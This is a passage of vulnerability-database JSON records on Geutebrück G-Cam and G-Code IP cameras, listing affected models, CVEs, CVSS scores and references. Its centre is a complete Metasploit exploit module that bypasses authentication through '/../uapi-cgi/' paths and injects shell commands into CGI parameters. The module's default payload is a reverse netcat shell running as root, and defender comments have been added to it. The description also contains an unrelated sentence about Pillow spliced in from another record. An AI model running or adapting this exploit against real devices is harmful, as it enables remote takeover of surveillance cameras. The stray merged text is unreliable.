          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "camera device"
            ],
            "sub_category": "camera",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          }
        ]
      },
      "last_update_date": "2025-01-30T21:03:15.617000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "GEUTEBRUCK \u2019 s\u00a0web\u00a0portal\u00a0 (Login required)",
            "trust": 0.8,
            "url": "https://portal.geutebrueck.com/"
          },
          {
            "title": "Geutebr\u00fcck G-Cam E2  and  G-Code Fixes for access control error vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=157940"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2095"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-306",
            "trust": 1.0
          },
          {
            "problemtype": "Command injection (CWE-77) [ Other ]",
            "trust": 0.8
          },
          {
            "problemtype": " Stack-based buffer overflow (CWE-121) [ Other ]",
            "trust": 0.8
          },
          {
            "problemtype": " Lack of authentication for important features (CWE-306) [ Other ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33543"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.3,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03"
          },
          {
            "trust": 1.7,
            "url": "https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/"
          },
          {
            "trust": 0.8,
            "url": "https://jvn.jp/vu/jvnvu97817785/"
          },
          {
            "trust": 0.8,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-05"
          },
          {
            "trust": 0.7,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33543"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2021041363"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2021.2550"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2021072807"
          },
          {
            "trust": 0.6,
            "url": "https://packetstormsecurity.com/files/164036/geutebruck-remote-command-execution.html"
          },
          {
            "trust": 0.1,
            "url": "https://ieeexplore.ieee.org/abstract/document/10769424"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/306.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33553"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/rapid7/metasploit-framework"
          },
          {
            "trust": 0.1,
            "url": "https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/\u0027],"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33544"
          },
          {
            "trust": 0.1,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03\u0027]"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33554"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33551"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33548"
          },
          {
            "trust": 0.1,
            "url": "https://metasploit.com/download"
          },
          {
            "trust": 0.1,
            "url": "http://geutebruck.com\u0027"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33550"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33552"
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33543"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2095"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33543"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33543"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2095"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33543"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-09-13T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-33543"
          },
          {
            "date": "2021-07-29T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "date": "2021-09-02T15:36:40",
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "date": "2021-04-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "date": "2021-07-27T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202107-2095"
          },
          {
            "date": "2021-09-13T18:15:19.693000",
            "db": "NVD",
            "id": "CVE-2021-33543"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-09-27T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-33543"
          },
          {
            "date": "2021-07-29T08:30:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "date": "2021-04-14T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "date": "2022-09-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202107-2095"
          },
          {
            "date": "2023-11-07T03:35:51.383000",
            "db": "NVD",
            "id": "CVE-2021-33543"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2095"
          }
        ],
        "trust": 0.7
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "GEUTEBRUCK\u00a0 Made \u00a0G-Cam\u00a0E2\u00a0 and \u00a0G-Code\u00a0 Multiple vulnerabilities in",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "other",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202109-0850

    Vulnerability from variot - Updated: 2025-01-30 20:43

    Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. The G-Cam E2 and G-Code products provided by GEUTEBRUCK contain the following vulnerabilities:
    * Lack of authentication for important features (CWE-306) - CVE-2021-33543
    * Command injection (CWE-77) - CVE-2021-33544, CVE-2021-33548, CVE-2021-33550, CVE-2021-33551, CVE-2021-33552, CVE-2021-33553, CVE-2021-33554
    * Stack-based buffer overflow (CWE-121) - CVE-2021-33545, CVE-2021-33546, CVE-2021-33547, CVE-2021-33549
    The expected impact depends on the vulnerability and may be as follows:
    * Confidential information is stolen by a remote third party because of improper default user authentication settings - CVE-2021-33543
    * Arbitrary code is executed by a remote third party through command injection - CVE-2021-33544, CVE-2021-33548, CVE-2021-33550, CVE-2021-33551, CVE-2021-33552, CVE-2021-33553, CVE-2021-33554
    * A remote third party triggers a buffer overflow in the counter parameter and executes arbitrary code - CVE-2021-33545
    * A remote third party triggers a buffer overflow in the name parameter and executes arbitrary code - CVE-2021-33546
    * A remote third party triggers a buffer overflow in the profile parameter and executes arbitrary code - CVE-2021-33547
    * A remote third party triggers a buffer overflow in the action parameter and executes arbitrary code - CVE-2021-33549
    [The next two sentences appear to be unrelated text merged in from another source record.] Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. ##

    This module requires Metasploit: https://metasploit.com/download

    Current source: https://github.com/rapid7/metasploit-framework

    # Metasploit exploit module for Geutebruck G-Cam / G-Code devices, covering
    # CVE-2021-33543 and the command-injection CVEs listed under 'References'.
    #
    # Defender notes, derived from the values in this module:
    # - Affected firmware per the description: <= 1.12.0.27, 1.12.13.2 and 1.12.14.5.
    # - Every target URI has the form /../uapi-cgi/<name>.cgi, and the description
    #   states that the HTTP basic authentication on /uapi-cgi/ is bypassed.
    #   Requests with that path shape in camera or proxy logs merit investigation.
    # - 'Privileged' => true and the description both say commands run as root.
    # - The default payload name indicates a reverse connection, so outbound
    #   sessions initiated by a camera are a signal worth monitoring.
    # - 'SideEffects' lists ARTIFACTS_ON_DISK, so files may remain on a device
    #   after a run; relevant when examining a suspected-compromised unit.
    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking
      include Msf::Exploit::Remote::HttpClient
      include Msf::Exploit::CmdStager
      # AutoCheck is a framework mixin; it runs `check` before `exploit`.
      prepend Msf::Exploit::Remote::AutoCheck

      # Registers the module metadata: name, description, authors, references,
      # seven targets (one per vulnerable CGI), default target and options.
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'Geutebruck Multiple Remote Command Execution',
            'Description' => %q{ This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder and exploits multiple authenticated arbitrary command execution vulnerabilities within the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as the root user. },
            'Author' => [
              'Titouan Lazard', # Of RandoriSec - Discovery
              'Ibrahim Ayadhi', # Of RandoriSec - Discovery and Metasploit Module
              'Sébastien Charbonnier' # Of RandoriSec - Metasploit Module
            ],
            'License' => MSF_LICENSE,
            'References' => [
              ['CVE', '2021-33543'],
              ['CVE', '2021-33544'],
              ['CVE', '2021-33548'],
              ['CVE', '2021-33550'],
              ['CVE', '2021-33551'],
              ['CVE', '2021-33552'],
              ['CVE', '2021-33553'],
              ['CVE', '2021-33554'],
              [ 'URL', 'http://geutebruck.com' ],
              [ 'URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'],
              [ 'URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03']
            ],
            'DisclosureDate' => '2021-07-08',
            'Privileged' => true,
            'Platform' => ['unix', 'linux'],
            'Arch' => [ARCH_CMD],
            # Each target gives the HTTP method, the request parameters and the
            # CGI path. The value holding PLACEHOLDER_CMD marks the parameter
            # that `exploit` fills in. For log review, the CGI names and
            # parameter names below are the ones tied to each CVE.
            'Targets' => [
              [
                'CVE-2021-33544 - certmngr.cgi', {
                  'http_method' => 'GET',
                  'http_vars' => {
                    'action' => 'createselfcert',
                    'local' => Rex::Text.rand_text_alphanumeric(10..16),
                    'country' => Rex::Text.rand_text_alphanumeric(2),
                    'state' => '$(PLACEHOLDER_CMD)',
                    'organization' => Rex::Text.rand_text_alphanumeric(10..16),
                    'organizationunit' => Rex::Text.rand_text_alphanumeric(10..16),
                    'commonname' => Rex::Text.rand_text_alphanumeric(10..16),
                    'days' => Rex::Text.rand_text_numeric(2..4),
                    'type' => Rex::Text.rand_text_numeric(2..4)
                  },
                  'uri' => '/../uapi-cgi/certmngr.cgi'
                }
              ],
              [
                'CVE-2021-33548 - factory.cgi', {
                  'http_method' => 'GET',
                  'http_vars' => { 'preserve' => '$(PLACEHOLDER_CMD)' },
                  'uri' => '/../uapi-cgi/factory.cgi'
                }
              ],
              [
                'CVE-2021-33550 - language.cgi', {
                  'http_method' => 'GET',
                  'http_vars' => { 'date' => '$(PLACEHOLDER_CMD)' },
                  'uri' => '/../uapi-cgi/language.cgi'
                }
              ],
              [
                'CVE-2021-33551 - oem.cgi', {
                  'http_method' => 'GET',
                  'http_vars' => {
                    'action' => 'set',
                    'enable' => 'yes',
                    'environment.lang' => '$(PLACEHOLDER_CMD)'
                  },
                  'uri' => '/../uapi-cgi/oem.cgi'
                }
              ],
              [
                'CVE-2021-33552 - simple_reclistjs.cgi', {
                  'http_method' => 'GET',
                  'http_vars' => {
                    'action' => 'get',
                    'timekey' => Rex::Text.rand_text_numeric(2..4),
                    'date' => '$(PLACEHOLDER_CMD)'
                  },
                  'uri' => '/../uapi-cgi/simple_reclistjs.cgi'
                }
              ],
              [
                'CVE-2021-33553 - testcmd.cgi', {
                  'http_method' => 'GET',
                  'http_vars' => { 'command' => 'PLACEHOLDER_CMD' },
                  'uri' => '/../uapi-cgi/testcmd.cgi'
                }
              ],
              [
                'CVE-2021-33554 - tmpapp.cgi', {
                  'http_method' => 'GET',
                  'http_vars' => { 'appfile.filename' => '$(PLACEHOLDER_CMD)' },
                  'uri' => '/../uapi-cgi/tmpapp.cgi'
                }
              ]
            ],
            'DefaultTarget' => 0,
            'DefaultOptions' => {
              'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
            },
            'Notes' => {
              'Stability' => ['CRASH_SAFE'],
              'Reliability' => ['REPEATABLE_SESSION'],
              'SideEffects' => ['ARTIFACTS_ON_DISK']
            }
          )
        )
      end

      # Fetches /brand.xml and extracts the firmware version string.
      #
      # Returns the first substring of the <firmware> element that looks like
      # d.d{1,3}.d{1,3}.d{1,3}, or false when the request fails, the body is
      # empty, the element is missing, or no version-like text is found.
      def firmware
        # Only the method and URI are given; no credentials are passed explicitly.
        res = send_request_cgi(
          'method' => 'GET',
          'uri' => '/brand.xml'
        )
        unless res
          print_error('Connection failed!')
          return false
        end

        unless res&.body && !res.body.empty?
          print_error('Empty body in the response!')
          return false
        end

        res_xml = res.get_xml_document
        if res_xml.at('//firmware').nil?
          print_error('Target did not respond with a XML document containing the "firmware" element!')
          return false
        end
        raw_text = res_xml.at('//firmware').text
        # The pattern is unanchored, so any text around the version is ignored.
        if raw_text && raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)
          raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)[0]
        else
          print_error('Target responded with a XML document containing the "firmware" element but its not a valid version string!')
          false
        end
      end

      # Version-based check only: no vulnerable endpoint is requested here.
      #
      # Returns Unknown when no version could be read, Appears for firmware
      # <= 1.12.0.27 or exactly 1.12.13.2 / 1.12.14.5, and Safe otherwise.
      # NOTE(review): Safe therefore means "the reported version is outside the
      # listed set", not that the device itself was tested.
      def check
        version = firmware
        if version == false
          return CheckCode::Unknown('Target did not respond with a valid XML response that we could retrieve the version from!')
        end

        rex_version = Rex::Version.new(version)
        vprint_status("Found Geutebruck version #{rex_version}")
        if rex_version <= Rex::Version.new('1.12.0.27') || rex_version == Rex::Version.new('1.12.13.2') || rex_version == Rex::Version.new('1.12.14.5')
          return CheckCode::Appears
        end

        CheckCode::Safe
      end

      # Builds and sends the single HTTP request described by the selected target.
      def exploit
        print_status("#{rhost}:#{rport} - Setting up request...")

        # Choose the send_request_cgi key that carries the parameters; every
        # target defined in initialize uses GET.
        method = target['http_method']
        if method == 'GET'
          http_method_vars = 'vars_get'
        else
          http_method_vars = 'vars_post'
        end

        # Replace the PLACEHOLDER_CMD marker inside each parameter value with
        # the encoded payload (an in-place string edit).
        http_vars = target['http_vars']
        http_vars.each do |(k, v)|
          if v.include? 'PLACEHOLDER_CMD'
            http_vars[k]['PLACEHOLDER_CMD'] = payload.encoded
          end
        end

        print_status("Sending CMD injection request to #{rhost}:#{rport}")
        send_request_cgi(
          {
            'method' => method,
            'uri' => target['uri'],
            http_method_vars => http_vars
          }
        )
        # The response is not examined; this message is printed regardless of
        # the outcome.
        print_status('Exploit complete, you should get a shell as the root user!')
      end
    end


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202109-0850",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "g-code een-2010",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code een-2010",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code een-2010",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code eec-2400",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * firmware    1.12.13.2    1.12.14.5"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* een-20xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* efd-22xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ethc-22xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * g-cam"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* eec-2xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "works with the above firmware  s  e2 series camera models   encoders"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ebc-21xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * g-code"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "( multiple products )"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ewpc-22xx"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33554"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Titouan Lazard and Ibrahim Ayadhi from RandoriSec reported these vulnerabilities to CISA.",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2084"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2021-33554",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.0,
                "id": "CVE-2021-33554",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.0,
